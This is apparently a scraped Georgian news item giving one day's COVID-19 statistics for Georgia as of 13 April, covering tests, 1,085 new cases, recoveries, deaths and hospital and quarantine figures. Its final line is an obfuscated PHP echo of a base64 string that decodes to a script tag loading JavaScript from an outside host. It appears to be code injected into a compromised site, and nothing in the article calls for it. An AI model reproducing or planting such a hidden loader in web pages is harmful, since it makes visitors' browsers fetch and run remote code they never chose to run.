celsiusi
ავერსი საქკაბელი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 35 863 კვლევა ტესტით, მათ შორის 23 896 კვლევა ანტიგენის ტესტით და 11 967 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 1 085 ახალი დადასტურებული შემთხვევა.
 
დღეს ქვეყანაში გამოვლენილი ინფიცირების 1 085 ახალი შემთხვევიდან 664 შემთხვევა თბილისში გამოვლინდა, დანარჩენები კი რეგიონებზე გადანაწილდა. 
 
 ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს 291 214-ს.
 
რაც შეეხება დადებითობის მაჩვენებელს, 13 აპრილის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 3.03 %, ბოლო 14 დღის მანძილზე - 2.56%, ხოლო 7 დღის მანძილზე - 2.67 %.
 
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 432 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა 278 683-მდე.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 7 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 3 901 პირი ემსხვერპლა.
  
ამ ეტაპზე ინფიცირების მიმდინარე აქტიური შემთხვევა არის 8 604, საიდანაც: 2 546 ადამიანი მკურნალობს საავადმყოფოში,აქედან ხელოვნური სუნთქვის აპარატზე იმყოფება 81 პირი, 5 720 პირი ვირუსის მკურნალობის კურსს გადის საცხოვრებელ ბინაზე. საკარანტინე სივრცეებში მოთავსებულია 162 ადამიანი. სულ 6 ოქტომბრიდან - 13 აპრილის პერიოდში, სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში გადაყვანილია - 24 194 პირი. ამ ეტაპისთვის თვითიზოლაციაში 13 708 ადამიანი იმყოფება. 
 
1518
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");